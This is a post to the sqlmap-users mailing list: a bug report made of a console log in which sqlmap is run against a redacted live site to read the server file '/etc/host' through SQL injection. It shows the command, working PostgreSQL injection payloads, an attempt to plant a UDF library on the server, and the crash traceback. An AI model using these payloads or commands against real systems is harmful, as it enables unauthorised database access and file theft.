g:\progz\Python27>python.exe sqlmap-2012\sqlmap.py -u
"http://********************/index.php?f_id=589&main=1";
-p main --file-read="/etc/host"
sqlmap/1.0-dev-621ae58 - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:34:52
[10:34:52] [INFO] resuming back-end DBMS 'postgresql'
[10:34:52] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: main
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: f_id=589&main=1 AND
4036=CAST((CHR(58)||CHR(104)||CHR(111)||CHR(97)||CHR(58))||(SELECT (CASE
WHEN (4036=403
6) THEN 1 ELSE 0
END))::text||(CHR(58)||CHR(117)||CHR(116)||CHR(117)||CHR(58)) AS NUMERIC)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: f_id=589&main=1; SELECT PG_SLEEP(5)--
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: f_id=589&main=1 AND 5444=(SELECT 5444 FROM PG_SLEEP(5))
---
[10:34:53] [INFO] the back-end DBMS is PostgreSQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: PostgreSQL
[10:34:53] [INFO] fingerprinting the back-end DBMS operating system
[10:34:53] [WARNING] time-based comparison needs larger statistical model.
Making a few dummy requests, please wait..
[10:34:57] [INFO] heuristics detected web page charset 'ascii'
[10:34:57] [WARNING] it is very important not to stress the network
adapter's bandwidth during usage of time-based queri
es
[10:34:58] [INFO] the back-end DBMS operating system is Linux
[10:34:59] [INFO] fetching file: '/etc/host'
[10:34:59] [INFO] testing if current user is DBA
[10:34:59] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[10:35:01] [INFO] checking if UDF 'sys_fileread' already exist
[10:35:02] [WARNING] reflective value(s) found and filtering out
do you want confirmation that the file '/tmp/libspnox.so' has been
successfully written on the back-end DBMS file system
? [Y/n]
[10:35:24] [WARNING] it looks like the file has not been written, this can
occur if the DBMS process' user has no write
privileges in the destination path
[10:35:26] [INFO] creating UDF 'sys_fileread' from the binary UDF file
[10:35:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-621ae58, retry
your run with the latest development version
from the GitHub repository. If the exception persists, please send by
e-mail to 'sqlmap-users@lists.sourceforge.net' or
open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new'
with the following text and any information req
uired to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev-621ae58
Python version: 2.7.2
Operating system: nt
Command line: sqlmap-2012\sqlmap.py -u
*************************************** --file-read=/etc/host
Technique: STACKED
Back-end DBMS: PostgreSQL (fingerprinted)
Traceback (most recent call last):
File "g:\progz\Python27\sqlmap-2012\_sqlmap.py", line 73, in main
start()
File "g:\progz\Python27\sqlmap-2012\lib\controller\controller.py", line
568, in start
action()
File "g:\progz\Python27\sqlmap-2012\lib\controller\action.py", line 150,
in action
conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
File "g:\progz\Python27\sqlmap-2012\plugins\generic\filesystem.py", line
234, in readFile
fileContent = self.__unhexString(fileContent)
File "g:\progz\Python27\sqlmap-2012\plugins\generic\filesystem.py", line
41, in __unhexString
if len(hexStr) % 2 != 0:
TypeError: object of type 'NoneType' has no len()
[*] shutting down at 10:35:28
g:\progz\Python27>
------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
